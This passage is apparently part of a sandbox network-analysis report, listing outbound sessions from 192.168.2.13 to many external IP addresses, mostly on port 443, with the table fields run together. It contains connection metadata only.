                                                11963192.168.2.13352581.188.110.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11964192.168.2.135044857.194.57.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11965192.168.2.133493869.184.106.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11966192.168.2.1349766179.70.182.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11967192.168.2.1338444145.211.185.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11968192.168.2.1346926139.43.112.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11969192.168.2.1353248134.84.144.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11970192.168.2.1359708109.212.251.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11971192.168.2.134244281.81.166.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11972192.168.2.1352440168.47.188.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11973192.168.2.1342182156.234.101.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11974192.168.2.1343402111.6.106.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11975192.168.2.1356166103.37.214.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11976192.168.2.1353640223.200.158.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11977192.168.2.134459023.73.131.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11978192.168.2.1350608174.169.240.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11979192.168.2.134533894.161.152.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11980192.168.2.1348704175.112.67.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11981192.168.2.135312050.202.63.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11982192.168.2.13381922.184.27.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11983192.168.2.1356472140.68.31.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11984192.168.2.135582260.177.93.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11985192.168.2.1356980176.142.224.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11986192.168.2.1343578201.119.221.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11987192.168.2.1359024182.69.7.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11988192.168.2.1340324137.202.141.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11989192.168.2.1337654169.144.86.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11990192.168.2.1351434210.162.47.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11991192.168.2.1342128177.125.64.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11992192.168.2.1345540148.61.52.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11993192.168.2.13552321.213.118.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11994192.168.2.134736272.48.184.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11995192.168.2.133442453.64.202.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11996192.168.2.1346880143.48.235.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11997192.168.2.133597472.67.121.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11998192.168.2.135252481.26.139.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11999192.168.2.1358714191.213.187.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12000192.168.2.135387269.124.16.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12001192.168.2.135019840.180.169.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12002192.168.2.1352972212.154.18.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12003192.168.2.1353402163.157.94.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12004192.168.2.1356720130.218.37.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12005192.168.2.1338038180.138.246.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12006192.168.2.135041437.208.54.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12007192.168.2.1358786198.83.168.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12008192.168.2.1351528128.93.241.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12009192.168.2.135499459.24.213.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12010192.168.2.133489620.116.134.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12011192.168.2.1339130148.150.230.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12012192.168.2.135246266.174.219.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12013192.168.2.133375664.221.176.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12014192.168.2.135974817.184.17.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12015192.168.2.135025685.4.61.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12016192.168.2.134240458.97.143.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12017192.168.2.135768858.179.232.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12018192.168.2.1355620200.68.108.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12019192.168.2.1335202151.189.60.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12020192.168.2.134014879.44.104.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12021192.168.2.1359804107.149.195.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12022192.168.2.1345318132.253.58.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12023192.168.2.1338314174.90.67.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12024192.168.2.133576874.223.123.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12025192.168.2.133694412.194.169.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12026192.168.2.1338696116.11.55.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12027192.168.2.1355184202.94.80.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12028192.168.2.1336706146.12.44.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12029192.168.2.1336770206.35.132.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12030192.168.2.1358692217.37.27.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12031192.168.2.1346002222.255.239.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12032192.168.2.1342530211.41.236.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12033192.168.2.1339498152.136.15.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12034192.168.2.133632261.220.124.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12035192.168.2.133600683.183.140.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12036192.168.2.1343004154.161.69.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12037192.168.2.135623458.88.151.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12038192.168.2.1337900175.245.207.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12039192.168.2.134857437.114.223.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12040192.168.2.135858820.125.72.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12041192.168.2.1355406222.240.63.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12042192.168.2.135640462.181.84.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12043192.168.2.1343130189.19.247.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12044192.168.2.1355514101.134.61.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12045192.168.2.135807859.214.211.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12046192.168.2.135071834.221.131.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12047192.168.2.134221451.3.123.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12048192.168.2.134528289.49.157.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12049192.168.2.1342500187.34.162.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12050192.168.2.134573299.215.82.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12051192.168.2.1347768173.191.11.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12052192.168.2.1335108117.233.162.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12053192.168.2.1357714205.145.246.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12054192.168.2.1354762153.248.243.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12055192.168.2.134203036.195.8.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12056192.168.2.1355426119.200.10.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12057192.168.2.1338334198.26.142.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12058192.168.2.1338440113.198.46.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12059192.168.2.134674696.7.188.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12060192.168.2.1346148161.200.209.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12061192.168.2.135412849.89.231.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12062192.168.2.1343038167.28.232.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12063192.168.2.133509234.55.77.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12064192.168.2.134006818.126.19.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12065192.168.2.1339690105.239.9.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12066192.168.2.1345550201.74.76.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12067192.168.2.1357524189.45.76.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12068192.168.2.1350186190.129.93.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12069192.168.2.133385276.151.217.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12070192.168.2.1350654161.47.29.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12071192.168.2.1346852187.110.84.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12072192.168.2.1357146176.149.88.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12073192.168.2.133389092.44.54.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12074192.168.2.1343944195.249.106.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12075192.168.2.1360948212.221.104.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12076192.168.2.1358552153.46.66.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12077192.168.2.1339508188.0.96.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12078192.168.2.133409066.202.167.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12079192.168.2.1341964148.175.37.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12080192.168.2.134602074.118.201.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12081192.168.2.133356298.142.86.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12082192.168.2.134972423.35.206.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12083192.168.2.1344382119.25.126.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12084192.168.2.1354412105.96.28.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12085192.168.2.1345622149.84.118.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12086192.168.2.134768844.39.193.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12087192.168.2.133563899.1.196.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12088192.168.2.1354618189.186.251.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12089192.168.2.1346216168.19.141.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12090192.168.2.1354886174.217.208.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12091192.168.2.1356812126.168.226.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12092192.168.2.1347044106.53.29.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12093192.168.2.135668647.96.253.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12094192.168.2.13397949.228.73.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12095192.168.2.1357702217.9.173.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12096192.168.2.1357894126.216.133.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12097192.168.2.1344260181.144.118.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12098192.168.2.1357826159.63.238.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12099192.168.2.1340570121.122.144.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12100192.168.2.1339568150.238.76.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12101192.168.2.1334400143.130.143.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12102192.168.2.133701049.118.239.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12103192.168.2.135258435.114.162.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12104192.168.2.134728459.193.110.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12105192.168.2.1357536220.176.33.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12106192.168.2.1349062115.248.118.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12107192.168.2.135810882.144.52.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12108192.168.2.134590846.239.223.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12109192.168.2.1349088152.118.14.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12110192.168.2.1335728102.247.8.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12111192.168.2.1350918211.21.147.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12112192.168.2.134863268.7.210.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12113192.168.2.134573683.22.131.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12114192.168.2.13368165.188.99.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12115192.168.2.13591062.90.117.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12116192.168.2.1342462110.100.36.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12117192.168.2.1357318222.93.148.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12118192.168.2.134008220.119.172.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12119192.168.2.13577842.105.40.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12120192.168.2.13395009.113.13.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12121192.168.2.1353778173.142.80.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12122192.168.2.1359300148.87.233.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12123192.168.2.133298032.185.194.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12124192.168.2.1347202130.144.99.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12125192.168.2.1358860120.27.59.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12126192.168.2.1344022107.236.131.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12127192.168.2.135019474.28.185.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12128192.168.2.134757014.204.66.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12129192.168.2.135409058.15.234.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12130192.168.2.135460093.104.175.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12131192.168.2.1350338190.173.250.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12132192.168.2.1359452161.201.120.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12133192.168.2.1342992194.225.24.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12134192.168.2.1349710157.164.76.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12135192.168.2.134167693.86.155.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12136192.168.2.1334644184.77.198.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12137192.168.2.13342384.113.80.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12138192.168.2.135935496.180.130.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12139192.168.2.134124666.171.170.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12140192.168.2.135687239.186.79.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12141192.168.2.1342148150.108.118.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12142192.168.2.1338902218.73.6.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12143192.168.2.1335330196.239.135.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12144192.168.2.1349346109.174.237.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12145192.168.2.1353350169.13.237.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12146192.168.2.13371325.41.229.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12147192.168.2.135778218.55.74.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12148192.168.2.134250838.53.107.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12149192.168.2.1346404172.150.233.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12150192.168.2.1334150161.25.206.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12151192.168.2.1334778131.106.237.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12152192.168.2.1346936209.183.74.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12153192.168.2.1343172170.92.104.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12154192.168.2.1360866222.61.222.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12155192.168.2.1333870111.152.67.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12156192.168.2.134428837.47.169.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12157192.168.2.1351954177.79.131.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12158192.168.2.1340620207.196.122.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12159192.168.2.133760027.212.190.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12160192.168.2.1346844162.54.87.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12161192.168.2.1347860185.115.41.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12162192.168.2.1335144158.233.148.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12163192.168.2.1353744172.127.225.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12164192.168.2.134547898.245.36.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12165192.168.2.1338546195.85.198.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12166192.168.2.1338324150.18.40.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12167192.168.2.135122662.115.183.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12168192.168.2.133466285.195.22.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12169192.168.2.1352060199.166.58.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12170192.168.2.134608086.123.104.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12171192.168.2.1353492162.149.156.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12172192.168.2.1346056211.175.168.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12173192.168.2.13330029.159.181.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12174192.168.2.1334230142.189.1.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12175192.168.2.1338668159.18.23.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12176192.168.2.136036476.236.217.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12177192.168.2.13398005.212.54.2637215
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12178192.168.2.1335758197.1.192.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12179192.168.2.1347726106.95.7.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12180192.168.2.136081686.103.123.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12181192.168.2.1342984165.150.139.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12182192.168.2.1342048198.31.159.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12183192.168.2.134663068.86.158.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12184192.168.2.1355642160.206.94.122443
                                                TimestampBytes transferredDirectionData


